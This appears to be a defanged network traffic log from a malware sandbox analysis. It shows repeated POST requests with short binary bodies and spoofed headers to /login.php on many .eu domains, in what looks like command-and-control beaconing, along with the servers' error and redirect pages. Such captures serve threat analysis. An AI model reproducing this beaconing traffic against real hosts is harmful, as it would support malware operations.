Date: Mon, 10 Nov 2014 20:01:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: X-Forwarded-For
X-Powered-By: PHP/5.3.10
X-Pingback: hXXp://lykil.se/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 7146
Accept-Ranges: bytes
X-Varnish: 2462812272
Age: 0
Via: 1.1 varnish
X-Loopia-Cache: MISS
<!DOCTYPE html>.<html lang="sv-SE" prefix="og: hXXp://ogp.me/ns# fb: hXXp://ogp.me/ns/fb#">.<head>.<meta charset="UTF-8" />.<title>404 Not Found | lykil</title>.<link rel="profile" href="hXXp://gmpg.org/xfn/11" />.<link rel="stylesheet" type="text/css" media="all" href="hXXp://lykil.se/wp-content/themes/page7/style.css" />.<link rel="pingback" href="hXXp://lykil.se/xmlrpc.php" />..<!-- SEO Ultimate (hXXp://VVV.seodesignsolutions.com/wordpress-seo/) -->.<!-- /SEO Ultimate -->..<link rel='stylesheet' id='frm-forms-css' href='hXXp://lykil.se/wp-content/plugins/formidable/css/frm_display.css?ver=1.07.04' type='text/css' media='all' />.<script type='text/javascript' src='hXXp://lykil.se/wp-includes/js/jquery/jquery.js?ver=1.11.1'></script>.<script type='text/javascript' src='hXXp://lykil.se/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script>.<link rel="EditURI" type="application/rsd xml" title="RSD" href="hXXp://lykil.se/xmlrpc.php?rsd" />.<link rel="wlwmanifest" type="application/wlwmanifest xml" href="hXXp://lykil.se/wp-includes/wlwmanifest.xml" /> .<meta name="generator" content="WordPress 4.0" />.<script src="http://lykil.se/wp-content/themes/page7/js/superfish-combined.js"></script>.<script src="hXXp://lykil.se/wp-content/themes/page7/js/jquery.cycle.all.min.js"></script>.<script src="hXXp://lykil.se/wp-content/themes/page7/js/script.js"></script>.&l
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gacek.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:31 GMT
Content-Type: text/html
Connection: close
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Apache/2
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">.<HTML>.<HEAD>.<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">.<meta http-equiv="Content-Language" content="pl">..<style type="text/css">.. body {font-family: arial; background: #ffffff; font-size: 8px color: white;}.. td { font-family: verdana; font-size: 11px;color: black; }.. p { font-family: verdana; font-size: 18px; color: black; text-align: center;}... a:hover {text-decoration: none; color: white}.</style>.<TITLE>.(none).</TITLE>.</HEAD>.<BODY style="bgcolor: #FFFFFF">......<div style="text-align:center;">.<br>.<table width="100%" border="0" cellpadding="0" cellspacing="0" style="align: center">.<tr><td style="width: 100%" align="center">..<table width="574" style="background-image:url(/errordocs/pasek.gif); height: 21px;" border="0" cellpadding="0" cellspacing="0" >...<tr>....<td style="text-align: left">....<div style="margin-left:45px"><b>Error</b></div>....</td>...</tr>...</table>..<table width="574" border="0" cellpadding="1" cellspacing="1" style="background-color: #9c9c9c;text-align:center;">...<tr>....<td style="background-color: #ffffff">.....<br>.....<table style="background-color: #ffffff">......<tr>.......<td align="center" valign="top"><IMG SRC="/errordocs/error.gif" ALT="eroor"></td>.......<td colspan="2" al
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganed.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 207
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyman.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:00:57 GMT
Server: Apache/1.3.36 (Unix) mod_ssl/2.8.27 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<html>..<head>..<title>The domain name is registered</title>..<meta http-equiv="Content-Type" content="text/html; charset=windows-1250">..<meta name="description" content="FORPSI je Evropsk. housingov. spole.nost. Nab.z. slu.by webhostingu, serverhostingu, registrace dom.nov.ch jmen a www str.nky na serverech Windows/Linux.">..<meta name="keywords" content="forpsi,webhosting,dom.na,dom.ny,hosting,server,serverhosting,housing,serverhousing,adsl,wifi,wi-fi,domain,domains">..<style type="text/css">..<!--..html, body {...margin: 0px;...padding: 0px;...height: 100%;...background-color: #32549c;..}..#container {...height: 100%;...width: 100%;...text-align: center;..}..#box {...width: 520px;...position: relative;...margin: 0 auto;...top: 160px;...border: 4px solid #cccccc;...background-color: #FFFFFF;...background-image: url(img/logo_forpsi.gif);...background-repeat: no-repeat;...background-position: left top;...padding: 20px;...font-family : Verdana, Arial, Helvetica, sans-serif;...font-size: 14px;...color: #38506b;..}..#box2 {...width: 520px;...position: relative;...margin: 0 auto;...top: 160px;...border: 4px solid #cccccc;...background-color: #FFFFFF;...padding: 20px;...font-family : Verdana, Arial, Helvetica, sans-serif;...font-size: 14px;...color: #38506b;..}...#flag {...position: absolute;...left: 95px;...top: 60px;..}...txt {...font-family: Verdana, Arial, Helvetica, sans-serif;...font-size:
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocer.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 301 Moved Permanently
Date: Mon, 10 Nov 2014 20:01:20 GMT
Server: Apache
Location: hXXp://VVV.vocer.org/login.php
Vary: Accept-Encoding
Content-Length: 238
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://VVV.vocer.org/login.php">here</a>.</p>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vonak.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 200 OK
Date: Mon, 10 Nov 2014 20:01:19 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.22-1~dotdeb.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" lang="nl" xml:lang="nl">...<head>.. .<title></title>. ... <meta http-equiv="content-type" content="text/html; charset=utf-8" />.. <meta name="keywords" content="" />.. <meta name="description" content="" />.. .<!--.. <meta property="og:title" content="" /> .. <meta property="og:site_name" content="" />.. <meta property="og:description" content="" /> .. <meta property="og:url" content="hXXp://vonak.eu" />.. --> ... <link rel="shortcut icon" href="" type="image/x-icon" />.. ..<style type="text/css">.. html, body {.. margin: 0px;. padding: 0px;. bottom: 0px;. height: 100%;. width: 100%;. border: 0px;. overflow: hidden;.. }.. iframe {.. margin: 0px;. padding: 0px;. bottom: 0px;. height: 100%;. width: 100%;. border: none;.. }... </style>...</head>...<body>.. .<iframe src="http
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganed.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 207
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocer.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 301 Moved Permanently
Date: Mon, 10 Nov 2014 20:01:22 GMT
Server: Apache
Location: hXXp://VVV.vocer.org/login.php
Vary: Accept-Encoding
Content-Length: 238
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://VVV.vocer.org/login.php">here</a>.</p>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: purel.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 207
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: purex.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 301 Moved Permanently
Date: Mon, 10 Nov 2014 20:01:24 GMT
Location: hXXp://corporate.evonik.com/en/
Content-Length: 239
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://corporate.evonik.com/en/">here</a>.</p>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qexer.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:28 GMT
Server: Apache / DataZone
Content-Length: 276
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache / DataZone Server at qexer.eu Port 80</address>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: purac.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 200 OK
Date: Mon, 10 Nov 2014 20:01:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1013
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN">.<html>.<head>.<title>The largest producer of natural lactic acid, derivatives, gluconates, lactides and polylactides</title>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">.<meta name="robots" content="index,follow">.<meta name="description" content="">.<meta name="keywords" content="natural lactic acid, derivatives, gluconates, lactides, polylactides">.<style type="text/css">.frameset { border:0px; margin:0px; padding:0px; } .frame { border:0px; margin:0px; padding:0px; }.</style>.</head>.<frameset rows="100%">.<frame src="hXXp://www.purac.com/" name="bescherm">.<noframes>.<body bgcolor="FFFFFF" link="000099" alink="000099" vlink="000099">.<div align="center">.<br><br>.<font face="Verdana, Arial" size="2">.hXXp://VVV.purac.com/<br><br>.Klik <a href="http://VVV.purac.com/">hier</A> wanneer u niet binnen 5 seconden automatisch wordt doorverbonden met onze website..</font>.</div>.</body>.</noframes>.</frameset> .</html>...
GET /login.php HTTP/1.0
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: VVV.dr.dk
Pragma: no-cache
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galor.eu
Content-Length: 9
Pragma: no-cache
Cookie: 3c861760030e5c7267e7fc479cac0c97=90ed9e5183ab72b8b4139ea09817675b
....~7.~'
HTTP/1.0 404 Artyku..u nie znaleziono
Cache-Control: no-cache
Connection: close
Content-Type: text/html
Date: Mon, 10 Nov 2014 20:01:02 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Pragma: no-cache
Server: IdeaWebServer/v0.80
<!DOCTYPE html>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="pl-pl" lang="pl-pl" dir="ltr">.<head>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<title>B....d: 404 Artyku..u nie znaleziono</title>..<meta name="viewport" content="width=device-width, initial-scale=1.0">....<link href='//fonts.googleapis.com/css?family=Open Sans' rel='stylesheet' type='text/css' />...<style type="text/css">....h1,h2,h3,h4,h5,h6,.site-title{.....font-family: 'Open Sans', sans-serif;....}...</style>...<link rel="stylesheet" href="/templates/protostar/css/template.css" type="text/css" />.....<link href="/templates/protostar/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" />...<style type="text/css">...body.site...{....border-top: 3px solid #0088cc;....background-color: #ffffff..}...a...{....color: #0088cc;...}....navbar-inner, .nav-list > .active > a, .nav-list > .active > a:hover, .dropdown-menu li > a:hover, .dropdown-menu .active > a, .dropdown-menu .active > a:hover, .nav-pills > .active > a, .nav-pills > .active > a:hover...{....background: #0088cc;...}....navbar-inner...{....-moz-box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px 10px rgba(0, 0, 0, .2);....-webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px 10px rgba(0, 0, 0, .2);....box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galor.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.0 404 Artyku..u nie znaleziono
Cache-Control: no-cache
Connection: close
Content-Type: text/html
Date: Mon, 10 Nov 2014 20:01:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Pragma: no-cache
Server: IdeaWebServer/v0.80
Set-Cookie: 3c861760030e5c7267e7fc479cac0c97=90ed9e5183ab72b8b4139ea09817675b; path=/; HttpOnly
<!DOCTYPE html>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="pl-pl" lang="pl-pl" dir="ltr">.<head>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<title>B....d: 404 Artyku..u nie znaleziono</title>..<meta name="viewport" content="width=device-width, initial-scale=1.0">....<link href='//fonts.googleapis.com/css?family=Open Sans' rel='stylesheet' type='text/css' />...<style type="text/css">....h1,h2,h3,h4,h5,h6,.site-title{.....font-family: 'Open Sans', sans-serif;....}...</style>...<link rel="stylesheet" href="/templates/protostar/css/template.css" type="text/css" />.....<link href="/templates/protostar/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" />...<style type="text/css">...body.site...{....border-top: 3px solid #0088cc;....background-color: #ffffff..}...a...{....color: #0088cc;...}....navbar-inner, .nav-list > .active > a, .nav-list > .active > a:hover, .dropdown-menu li > a:hover, .dropdown-menu .active > a, .dropdown-menu .active > a:hover, .nav-pills > .active > a, .nav-pills > .active > a:hover...{....background: #0088cc;...}....navbar-inner...{....-moz-box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px 10px rgba(0, 0, 0, .2);....-webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px 10px rgba(0, 0, 0, .2);....box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocab.eu
Content-Length: 9
Pragma: no-cache
Cookie: PHPSESSID=envpqbkkkiv4cm5eun0u8hgar1
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 10 Nov 2014 20:02:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.4-14 deb7u8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
<div id="saleslander">. <div class="inner clearfix">.. <span class="icon"></span>. . <h1>vocab.eu<span> is for sale!</span></h1>. <h3>Buying this domain means full control and ownership.</h3>. <div class="domain_actions">. <div class="box_payments">. <p>Price in Words:<br/><b>nine hundred and ninety-nine</b></p>. <p>Domain Punycode:<br/><b class="punycode">vocab.eu</b></p>. <p>Payment options:</p><p class="paymentimg">. <img style="border:0;" src="hXXp://vocab.eu/images/payment/visa.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="height:28px;" src="http://vocab.eu/images/payment/visa_verified.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="border:0;" src="hXXp://vocab.eu/images/payment/mastercard.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />. <img style="height:28px;" src="hXXp://vocab.eu/images/payment/mastercard_securecode.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />
<<< skipped >>>
GET /login.php HTTP/1.0
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: VVV.gater.eu
Pragma: no-cache
HTTP/1.1 404 OK
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.2.0
X-Powered-By: ASP.NET
Date: Mon, 10 Nov 2014 20:01:30 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>The page cannot be found</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">..<STYLE type="text/css">.. BODY { font: 8pt/12pt verdana }.. H1 { font: 13pt/15pt verdana }.. H2 { font: 8pt/12pt verdana }.. A:link { color: red }.. A:visited { color: maroon }..</STYLE>..</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>..<h1>The page cannot be found</h1>..The page you are looking for might have been removed, had its name changed, or is temporarily unavailable...<hr>..<p>Please try the following:</p>..<ul>..<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>..<li>If you reached this page by clicking a link, contact.. the Web site administrator to alert them that the link is incorrectly formatted...</li>..<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>..</ul>..<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>..<hr>..<p>Technical Information (for support personnel)</p>..<ul>..<li>Go to <a href="hXXp://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> a
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: volez.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:20 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Length: 281
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.16 (Debian) Server at volez.eu Port 80</address>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadak.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:33 GMT
Server: Apache
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>...
GET /login.php HTTP/1.0
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: VVV.gater.eu
Pragma: no-cache
HTTP/1.1 404 OK
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.2.0
X-Powered-By: ASP.NET
Date: Mon, 10 Nov 2014 20:01:31 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>The page cannot be found</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">..<STYLE type="text/css">.. BODY { font: 8pt/12pt verdana }.. H1 { font: 13pt/15pt verdana }.. H2 { font: 8pt/12pt verdana }.. A:link { color: red }.. A:visited { color: maroon }..</STYLE>..</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>..<h1>The page cannot be found</h1>..The page you are looking for might have been removed, had its name changed, or is temporarily unavailable...<hr>..<p>Please try the following:</p>..<ul>..<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>..<li>If you reached this page by clicking a link, contact.. the Web site administrator to alert them that the link is incorrectly formatted...</li>..<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>..</ul>..<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>..<hr>..<p>Technical Information (for support personnel)</p>..<ul>..<li>Go to <a href="hXXp://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> a
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatun.eu
Content-Length: 9
Pragma: no-cache
Cookie: 22afb07fb7b37e411b809b5a50bb58a4=e3d67bf7a2853f95840a6b5a8f632b61
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx/1.2.4
Date: Mon, 10 Nov 2014 20:01:01 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Status: 404 Article not found
Cache-Control: no-cache
Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="ltr">..<head>...<title>404 - Error: 404</title>...<link rel="stylesheet" href="/templates/gatun_jslab/css/style.css" type="text/css" />..</head>..<body>..<div class="box404"><img src="/templates/gatun_jslab/images/404.png" alt="" /></div>.. <!--...<div class="error">....<div id="outline">....<div id="errorboxoutline">.....<div id="errorboxheader">404 - Article not found</div>.....<div id="errorboxbody">.....<p><strong>You may not be able to visit this page because of:</strong></p>......<ol>.......<li>an <strong>out-of-date bookmark/favourite</strong></li>.......<li>a search engine that has an <strong>out-of-date listing for this site</strong></li>.......<li>a <strong>mistyped address</strong></li>.......<li>you have <strong>no access</strong> to this page</li>.......<li>The requested resource was not found.</li>.......<li>An error has occurred while processing your request.</li>......</ol>.....<p><strong>Please try one of the following pages:</strong></p>......<ul>.......<li><a href="/index.php" title="Go to the Home P
<<< skipped >>>
GET /login.php HTTP/1.0
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: VVV.vocer.org
Pragma: no-cache
HTTP/1.0 404 Not Found
Date: Mon, 10 Nov 2014 20:01:22 GMT
Server: Apache
X-Powered-By: PHP/5.4.34-nmm1
X-Pingback: hXXp://VVV.vocer.org/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
